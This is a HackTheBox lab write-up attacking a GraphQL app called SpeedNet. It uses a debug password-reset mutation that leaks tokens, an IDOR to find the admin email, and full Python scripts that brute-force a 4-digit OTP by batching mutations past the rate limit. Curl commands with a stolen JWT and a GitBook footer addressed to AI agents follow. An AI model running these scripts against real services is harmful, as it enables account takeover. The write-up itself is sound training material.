string.","fields":[{"name":"name","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"description","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"isDeprecated","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"deprecationReason","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"OBJECT","name":"__Directive","description":"A Directive provides a way to describe alternate runtime execution and type validation behavior in a GraphQL document.\n\nIn some cases, you need to provide options to alter GraphQL's execution behavior in ways field arguments will not suffice, such as conditionally including or skipping a field. Directives provide this by describing additional information to the executor.","fields":[{"name":"name","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"description","description":null,"args":[],"type":{"kind":"SCALAR","name":"String","ofType":null},"isDeprecated":false,"deprecationReason":null},{"name":"isRepeatable","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"isDeprecated":false,"deprecationReason":null},{"name":"locations","description":null,"args":[],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"ENUM","name":"__DirectiveLocation","ofType":null}}}},"isDeprecated":false,"deprecationReason":null},{"name":"args","description":null,"args":[{"name":"includeDeprecated","description":null,"type":{"kind":"SCALAR","name":"Boolean","ofType":null},"defaultValue":"false"}],"type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"LIST","name":null,"ofType":{"kind":"NON_NULL","name":null,"ofType":{"kind":"OBJECT","name":"__InputValue","ofType":null}}}},"isDeprecated":false,"deprecationReason":null}],"inputFields":null,"interfaces":[],"enumValues":null,"possibleTypes":null},{"kind":"ENUM","name":"__DirectiveLocation","description":"A Directive can be adjacent to many parts of the GraphQL language, a __DirectiveLocation describes one such possible adjacencies.","fields":null,"inputFields":null,"interfaces":null,"enumValues":[{"name":"QUERY","description":"Location adjacent to a query operation.","isDeprecated":false,"deprecationReason":null},{"name":"MUTATION","description":"Location adjacent to a mutation operation.","isDeprecated":false,"deprecationReason":null},{"name":"SUBSCRIPTION","description":"Location adjacent to a subscription operation.","isDeprecated":false,"deprecationReason":null},{"name":"FIELD","description":"Location adjacent to a field.","isDeprecated":false,"deprecationReason":null},{"name":"FRAGMENT_DEFINITION","description":"Location adjacent to a fragment definition.","isDeprecated":false,"deprecationReason":null},{"name":"FRAGMENT_SPREAD","description":"Location adjacent to a fragment spread.","isDeprecated":false,"deprecationReason":null},{"name":"INLINE_FRAGMENT","description":"Location adjacent to an inline fragment.","isDeprecated":false,"deprecationReason":null},{"name":"VARIABLE_DEFINITION","description":"Location adjacent to a variable definition.","isDeprecated":false,"deprecationReason":null},{"name":"SCHEMA","description":"Location adjacent to a schema definition.","isDeprecated":false,"deprecationReason":null},{"name":"SCALAR","description":"Location adjacent to a scalar definition.","isDeprecated":false,"deprecationReason":null},{"name":"OBJECT","description":"Location adjacent to an object type definition.","isDeprecated":false,"deprecationReason":null},{"name":"FIELD_DEFINITION","description":"Location adjacent to a field definition.","isDeprecated":false,"deprecationReason":null},{"name":"ARGUMENT_DEFINITION","description":"Location adjacent to an argument definition.","isDeprecated":false,"deprecationReason":null},{"name":"INTERFACE","description":"Location adjacent to an interface definition.","isDeprecated":false,"deprecationReason":null},{"name":"UNION","description":"Location adjacent to a union definition.","isDeprecated":false,"deprecationReason":null},{"name":"ENUM","description":"Location adjacent to an enum definition.","isDeprecated":false,"deprecationReason":null},{"name":"ENUM_VALUE","description":"Location adjacent to an enum value definition.","isDeprecated":false,"deprecationReason":null},{"name":"INPUT_OBJECT","description":"Location adjacent to an input object type definition.","isDeprecated":false,"deprecationReason":null},{"name":"INPUT_FIELD_DEFINITION","description":"Location adjacent to an input object field definition.","isDeprecated":false,"deprecationReason":null}],"possibleTypes":null}],"directives":[{"name":"include","description":"Directs the executor to include this field or fragment only when the `if` argument is true.","locations":["FIELD","FRAGMENT_SPREAD","INLINE_FRAGMENT"],"args":[{"name":"if","description":"Included when true.","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"defaultValue":null}]},{"name":"skip","description":"Directs the executor to skip this field or fragment when the `if` argument is true.","locations":["FIELD","FRAGMENT_SPREAD","INLINE_FRAGMENT"],"args":[{"name":"if","description":"Skipped when true.","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"Boolean","ofType":null}},"defaultValue":null}]},{"name":"deprecated","description":"Marks an element of a GraphQL schema as no longer supported.","locations":["FIELD_DEFINITION","ARGUMENT_DEFINITION","INPUT_FIELD_DEFINITION","ENUM_VALUE"],"args":[{"name":"reason","description":"Explains why this element was deprecated, usually also including a suggestion for how to access supported similar data. Formatted using the Markdown syntax, as specified by [CommonMark](<https://commonmark.org/>).","type":{"kind":"SCALAR","name":"String","ofType":null},"defaultValue":"\"No longer supported\""}]},{"name":"specifiedBy","description":"Exposes a URL that specifies the behavior of this scalar.","locations":["SCALAR"],"args":[{"name":"url","description":"The URL that specifies the behavior of this scalar.","type":{"kind":"NON_NULL","name":null,"ofType":{"kind":"SCALAR","name":"String","ofType":null}},"defaultValue":null}]},{"name":"oneOf","description":"Indicates exactly one field must be supplied and this field must not be `null`.","locations":["INPUT_OBJECT"],"args":[]}]}}}

```

**A. Input Structures (Crafting Payloads)**

* `RegisterInput` Fields: `email`, `firstName`, `lastName`, `username`, `password`, `address`, `phoneNumber` (all marked `NON_NULL` scalar `String`).
* `ProfileInput` Fields: `firstName`, `lastName`, `address`, `phoneNumber`, `twoFactorAuthEnabled` (`Boolean`).

**B. Read Endpoints (`Query`)**

* `userProfile(userId: Int!)`: Accepts an integer ID. Primary candidate for Insecure Direct Object Reference (IDOR) testing.
* `invoiceHistory(limit: Int)` & `dataUsageStats(days: Int)`: Operational queries exposing billing and telemetry data.

**C. Internal Data Models & Enums**

* `User` Object: Exposes sensitive backend fields like `plan`, `planStatus`, `dataUsage`, and `twoFactorAuthEnabled`.
* Enums Discovered:
  * `PlanType`: `BASIC`, `PREMIUM`, `BUSINESS`
  * `PlanStatus`: `TRIAL`, `ACTIVE`, `INACTIVE`
  * `InvoiceStatus`: `PENDING`, `PAID`, `OVERDUE`

#### Mutations discovered

| Mutation                | Args                 | Returns        | Notes                                   |
| ----------------------- | -------------------- | -------------- | --------------------------------------- |
| `register`              | `RegisterInput`      | `AuthResponse` | Normal registration                     |
| `login`                 | `email, password`    | `AuthResponse` | Returns pre-2FA token if 2FA enabled    |
| `updateProfile`         | `ProfileInput`       | `User`         | Includes `twoFactorAuthEnabled` field   |
| `forgotPassword`        | `email`              | `String`       | Sends email normally                    |
| **`devForgotPassword`** | `email`              | `String`       | **Returns raw reset token in response** |
| `resetPassword`         | `token, newPassword` | `String`       | Completes password reset                |
| `verifyTwoFactor`       | `token, otp`         | `AuthResponse` | 2FA verification                        |
| `resendOTP`             | `token`              | `Boolean`      | Resends OTP                             |

The `devForgotPassword` mutation is a debug endpoint left in production. Unlike `forgotPassword` which sends an email, this one returns the reset token directly in the API response.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FlTlxpqqPHODNEDCGNWOX%2Fimage.png?alt=media&amp;token=2e987493-f968-44fa-a4e5-8701cd8b59a2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FiSPzXxu8yINueZa73YoP%2Fimage.png?alt=media&amp;token=0da970d2-9230-4fac-937e-b5b68c224bcb" alt=""><figcaption></figcaption></figure>

if we access the reset password link, we can set up our new password.

Now using the `devForgotpassword,` directly displays the token instead of sending the code to mail.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F6wygcN1nXAbgql4ZNgmX%2Fimage.png?alt=media&amp;token=8881c99f-f743-4344-a8a3-2bc8708e5ab5" alt=""><figcaption></figcaption></figure>

The raw UUID token is returned in the response body. This can be used immediately with `resetPassword` to take over any account whose email is known.

But i need to get the username of admin or any other valid user to reset his password.

### IDOR to Enumerate Users

The `userProfile` query accepts an arbitrary integer `userId` with no ownership check.&#x20;

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFWlgZxf42S0N44OI9qqH%2Fimage.png?alt=media&amp;token=427fb4cb-487f-467c-9c9f-59e18e36cf1d" alt=""><figcaption></figcaption></figure>

if i change the id value to 1 the information of admin user is displayed.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FCZ6GoXVYJg1mD2KCkydm%2Fimage.png?alt=media&amp;token=e95ea977-4b4a-44cd-9ddb-cbaa95a0638c" alt=""><figcaption></figcaption></figure>

### Admin Account Take Over

now i can use the mail of admin to reset his token.

```powershell
{
  "query": "mutation { devForgotPassword(email: \"admin@speednet.htb\") }"
}
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FdbKoko5TSBPvz1f6KeZX%2Fimage.png?alt=media&amp;token=785646c4-31f2-4e24-90ed-e101f97febcc" alt=""><figcaption></figcaption></figure>

using the password reset token i can reset the password of admin.

```powershell
{
  "query": "mutation { resetPassword(token: \"277c18b6-8875-4521-86bd-ae518af61773\", newPassword: \"Pwned123!\") }"
}
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2F3HgFVQqWBuyNXt1XO3Ak%2Fimage.png?alt=media&amp;token=cfea7c15-f4ab-4ffe-af26-557e0e59f2cf" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FFp73LNXRn4grncpKvyHl%2Fimage.png?alt=media&amp;token=c6b071e0-32de-4af7-a8bc-16b9f4d268fe" alt=""><figcaption></figcaption></figure>

Signing in as admin, displays a 2FA display that an OTP is sent.

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FUFe6rT44IhpQ7O4ISU65%2Fimage.png?alt=media&amp;token=9c98ffa4-15ca-44ef-8546-e4ac05bebdbb" alt=""><figcaption></figcaption></figure>

Since we don't have access to the admin's email messages, we need to find another way to get\
in. As we already know that the OTP is weak 4 digits we can brute force the OTP.

However if we try to perform brute force, we got 429 response codes, which indicate there is a\
rate limiting protection.

```powershell
┌──(ajay㉿kali)-[~]
└─$ seq -w 0000 9999 > pins.txt 
```

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FgmouyqB647kb7ahHtDfO%2Fimage.png?alt=media&amp;token=768cec28-8d09-47a9-aab8-556150531e3f" alt=""><figcaption></figcaption></figure>

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2Fybd1CLWsop3GiFdyREFb%2Fimage.png?alt=media&amp;token=74b02d1f-c949-443d-a97e-9935471b7c0b" alt=""><figcaption></figcaption></figure>

After performing some fuzzing, it was found that rate limit would appeared if we try to send\
around 40 requests per minute. Based on the 2FA email, the OTP probably last for 5 minutes\
before it expired.\
The time frame is not long enough to perform the attack.

Fortunately, there's GraphQL technique that can be used to bypass rate limit protection called\
GraphQL Batching Attacks

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/GraphQL%20Injection/README.md#graphql-batching-attacks>" %}

### GraphQL Rate Limit Bypass

Sending 10,000 individual requests triggers rate limiting and each request refreshes the token TTL. A new login generates a new OTP  so we can never exhaust the keyspace one-by-one.

Using the technique mentioned in the reference, we can send multiple query / mutation in single http requests, thus making our requests shorter.

GraphQL allows multiple operations in a single request using aliases:

<figure><img src="https://3740518612-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOH84nxPA0OhkjhNX692h%2Fuploads%2FMFlmj7WnsIpzY2tKd3Fz%2Fimage.png?alt=media&amp;token=cde2c112-173f-40c0-9b94-699024ded58a" alt=""><figcaption></figcaption></figure>

The rate limiter counts **HTTP requests**, not operations inside a request. Sending 500 OTP attempts per request means only 20 requests are needed to cover all 10,000 possibilities  all against the same token before it expires.

That said created a custom python script which automatically logins and extract the token and bruteforce the OTP.

```powershell
import json, requests
from concurrent.futures import ThreadPoolExecutor, as_completed

TARGET   = "<http://154.57.164.81:32756/graphql>"
EMAIL    = "admin@speednet.htb"
PASSWORD = "Pwned123!"
CHUNK    = 500
THREADS  = 20  # fire all chunks simultaneously

headers = {
    "Content-Type": "application/json",
    "Origin": TARGET,
}

def get_token():
    payload = json.dumps({
        "query": f'mutation {{ login(email: "{EMAIL}", password: "{PASSWORD}") {{ token }} }}'
    })
    r = requests.post(TARGET, headers=headers, data=payload, timeout=10)
    data = r.json()
    try:
        msg = data["errors"][0]["message"]
        if "2FA_REQUIRED:" in msg:
            token = msg.split("2FA_REQUIRED:")[1].strip()
            print(f"[+] Token: {token}")
            return token
    except Exception:
        print(f"[-] Login failed: {data}")
        exit()

def attack_chunk(token, chunk_start):
    mutations = []
    for i in range(chunk_start, chunk_start + CHUNK):
        otp = str(i).zfill(4)
        mutations.append(
            f'a{otp}: verifyTwoFactor(token: "{token}", otp: "{otp}") {{ token user {{ id email }} }}'
        )
    query   = "mutation { " + " ".join(mutations) + " }"
    payload = json.dumps({"query": query})

    try:
        r = requests.post(TARGET, headers=headers, data=payload, timeout=30)
        if r.status_code != 200 or not r.text.strip():
            return None, chunk_start, f"HTTP {r.status_code}"
        result = r.json()
        for key, val in result.get("data", {}).items():
            if val and val.get("token"):
                return val, chunk_start, key[1:]
        return None, chunk_start, "no hit"
    except Exception as e:
        return None, chunk_start, str(e)

# Main loop — get token then fire ALL chunks at once
while True:
    print("\n[*] Getting fresh token...")
    TOKEN = get_token()

    print(f"[*] Launching {THREADS} threads simultaneously...")
    chunks = list(range(0, 10000, CHUNK))
    found = False

    with ThreadPoolExecutor(max_workers=THREADS) as executor:
        futures = {executor.submit(attack_chunk, TOKEN, c): c for c in chunks}
        for future in as_completed(futures):
            val, start, info = future.result()
            end = start + CHUNK - 1
            if val:
                print(f"\n[+] SUCCESS! OTP range {start:04d}-{end:04d}")
                print(f"[OTP]       {info}")
                print(f"[ADMIN JWT] {val['token']}")
                print(f"[EMAIL]     {val['user']['email']}")
                found = True
                break
            else:
                print(f"    {start:04d}-{end:04d} → {info}")

    if found:
        break
    print("\n[!] Token expired before hit — retrying with new token...")

```

```powershell
──(ajay㉿kali)-[~]
└─$ python3 tok.py

[*] Getting fresh token...
[+] Token: 43adfef8-eaff-4dbb-8d87-4ceb970bd427
[*] Launching 20 threads simultaneously...
    6500-6999 → HTTP 429
    7000-7499 → HTTP 429
    5500-5999 → HTTP 429
    8000-8499 → HTTP 429
    9500-9999 → HTTP 429
    1000-1499 → no hit
    3500-3999 → no hit
    6000-6499 → no hit
    0500-0999 → no hit
    9000-9499 → no hit
    2500-2999 → no hit
    1500-1999 → no hit
    8500-8999 → no hit
    3000-3499 → no hit
    2000-2499 → no hit
    5000-5499 → no hit
    7500-7999 → no hit

[+] SUCCESS! OTP range 4000-4499
[OTP]       4462
[ADMIN JWT] eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsImlhdCI6MTc4NjIwMzQzNywiZXhwIjoxNzg2MjA3MDM3fQ.-tTOkyYDgEBBhDNErb48bJK09iKVGHnAGelcYYQd47E
[EMAIL]     admin@speednet.htb

```

Running the script successfully cracked the OTP.

Use the obtained JWT as the `Authorization` header for all subsequent requests:

```powershell
──(ajay㉿kali)-[~]
└─$ curl -s -X POST <http://154.57.164.81:32756/graphql> \
  -H "Content-Type: application/json" \
  -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsImlhdCI6MTc4NjIwMzQzNywiZXhwIjoxNzg2MjA3MDM3fQ.-tTOkyYDgEBBhDNErb48bJK09iKVGHnAGelcYYQd47E" \
  -d '{"query":"{ userProfile(userId: 1) { id email username plan planStatus twoFactorAuthEnabled } }"}' | python3 -m json.tool
{
    "data": {
        "userProfile": {
            "id": 1,
            "email": "admin@speednet.htb",
            "username": "admin",
            "plan": "BASIC",
            "planStatus": "TRIAL",
            "twoFactorAuthEnabled": true
        }
    }
}

```

Full billing and invoice data is now accessible and the Flag is obtained from the billing Data.

```powershell
──(ajay㉿kali)-[~]
└─$ curl -s -X POST <http://154.57.164.81:32756/graphql> \
  -H "Content-Type: application/json" \
  -H "Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjEsImlhdCI6MTc4NjIwMzQzNywiZXhwIjoxNzg2MjA3MDM3fQ.-tTOkyYDgEBBhDNErb48bJK09iKVGHnAGelcYYQd47E" \
  -d '{"query":"{ currentInvoice { id number amount status dueDate } invoiceHistory(limit: 100) { id number amount status dueDate } }"}' \
  | python3 -m json.tool
{
    "data": {
        "currentInvoice": {
            "id": 1,
            "number": "INV-2025-001",
            "amount": 100,
            "status": "PENDING",
            "dueDate": "1738231200000"
        },
        "invoiceHistory": [
            {
                "id": 1,
                "number": "INV-2025-001",
                "amount": 100,
                "status": "PENDING",
                "dueDate": "1738231200000"
            },
            {
                "id": 26,
                "number": "INV-2024-012",
                "amount": 1200,
                "status": "PAID",
                "dueDate": "1733392800000"
            },
            {
                "id": 25,
                "number": "INV-2024-011",
                "amount": 1100,
                "status": "PAID",
                "dueDate": "1731664800000"
            },
            {
                "id": 24,
                "number": "INV-2024-010",
                "amount": 1000,
                "status": "PAID",
                "dueDate": "1729418400000"
            },
            {
                "id": 23,
                "number": "INV-2024-009",
                "amount": 900,
                "status": "PAID",
                "dueDate": "1725962400000"
            },
            {
                "id": 22,
                "number": "INV-2024-008",
                "amount": 800,
                "status": "PAID",
                "dueDate": "1723716000000"
            },
            {
                "id": 21,
                "number": "INV-2024-007",
                "amount": 700,
                "status": "PAID",
                "dueDate": "1722333600000"
            },
            {
                "id": 20,
                "number": "INV-2024-006",
                "amount": 600,
                "status": "PAID",
                "dueDate": "1719309600000"
            },
            {
                "id": 19,
                "number": "INV-2024-005",
                "amount": 500,
                "status": "PAID",
                "dueDate": "1715767200000"
            },
            {
                "id": 18,
                "number": "HTB{gr4phql_3xpl01t_1n_a_nutsh3ll}",
                "amount": 400,
                "status": "PAID",
                "dueDate": "1712311200000"
            },
            {
                "id": 17,
                "number": "INV-2024-003",
                "amount": 300,
                "status": "PAID",
                "dueDate": "1710064800000"
            },
            {
                "id": 16,
                "number": "INV-2024-002",
                "amount": 250,
                "status": "PAID",
                "dueDate": "1708423200000"
            },
            {
                "id": 15,
                "number": "INV-2024-001",
                "amount": 150,
                "status": "PAID",
                "dueDate": "1705312800000"
            }
        ]
    }
}
      
```

### Manual Exploit script

Instead of the making the script to automatically login and extract the token, we can use the below scrip to manually edit the file to given the token.

```bash
import json, requests, time
from concurrent.futures import ThreadPoolExecutor, as_completed

TARGET  = "http://154.57.164.81:32756/graphql"
TOKEN   = "e42393f7-9567-4ee6-b78d-980ea48a94b6"
CHUNK   = 500
THREADS = 10

headers = {
    "Content-Type": "application/json",
    "Origin": TARGET,
}

def attack_chunk(chunk_start):
    mutations = []
    for i in range(chunk_start, chunk_start + CHUNK):
        otp = str(i).zfill(4)
        mutations.append(
            f'a{otp}: verifyTwoFactor(token: "{TOKEN}", otp: "{otp}") {{ token user {{ id email firstName lastName }} }}'
        )
    query   = "mutation { " + " ".join(mutations) + " }"
    payload = json.dumps({"query": query})
    try:
        r = requests.post(TARGET, headers=headers, data=payload, timeout=30)
        return r.status_code, r.text, chunk_start
    except Exception as e:
        return 0, "", chunk_start

# Full range 0000-9999
all_chunks = list(range(0, 10000, CHUNK))
retry_429  = []
found      = False

print(f"[*] Token: {TOKEN}")
print(f"[*] Attacking all {len(all_chunks)} chunks ({THREADS} threads)...\n")

with ThreadPoolExecutor(max_workers=THREADS) as executor:
    futures = {executor.submit(attack_chunk, c): c for c in all_chunks}
    for future in as_completed(futures):
        status, text, start = future.result()
        end = start + CHUNK - 1

        if status == 429:
            print(f"    {start:04d}-{end:04d} → 429 (queued for retry)")
            retry_429.append(start)
            continue

        if status != 200 or not text.strip():
            print(f"    {start:04d}-{end:04d} → HTTP {status}")
            continue

        try:
            result = json.loads(text)
        except:
            print(f"    {start:04d}-{end:04d} → bad JSON")
            continue

        hit = False
        for key, val in result.get("data", {}).items():
            if val and val.get("token"):
                otp = key[1:]
                print(f"\n[+] SUCCESS!")
                print(f"[OTP]   {otp}")
                print(f"[JWT]   {val['token']}")
                print(f"[ID]    {val['user']['id']}")
                print(f"[EMAIL] {val['user']['email']}")
                print(f"[NAME]  {val['user']['firstName']} {val['user']['lastName']}")
                found = True
                hit = True
                break
        if not hit and not found:
            print(f"    {start:04d}-{end:04d} → no hit")

# Retry ALL 429s sequentially
if not found and retry_429:
    print(f"\n[*] Retrying {len(retry_429)} rate-limited chunks sequentially...")
    for start in sorted(retry_429):
        time.sleep(3)
        status, text, start = attack_chunk(start)
        end = start + CHUNK - 1
        print(f"    {start:04d}-{end:04d} → HTTP {status}", end=" ", flush=True)
        if status == 200 and text.strip():
            try:
                result = json.loads(text)
                for key, val in result.get("data", {}).items():
                    if val and val.get("token"):
                        otp = key[1:]
                        print(f"\n[+] SUCCESS!")
                        print(f"[OTP]   {otp}")
                        print(f"[JWT]   {val['token']}")
                        print(f"[ID]    {val['user']['id']}")
                        print(f"[EMAIL] {val['user']['email']}")
                        found = True
                        break
                if not found:
                    print("no hit")
            except:
                print("bad JSON")
        if found:
            break

if not found:
    print("\n[-] Token expired — grab a fresh one and rerun immediately")

```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://ajaykumar-kanthi.gitbook.io/write-ups/hackthebox-cwes-track/htb-speednet.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
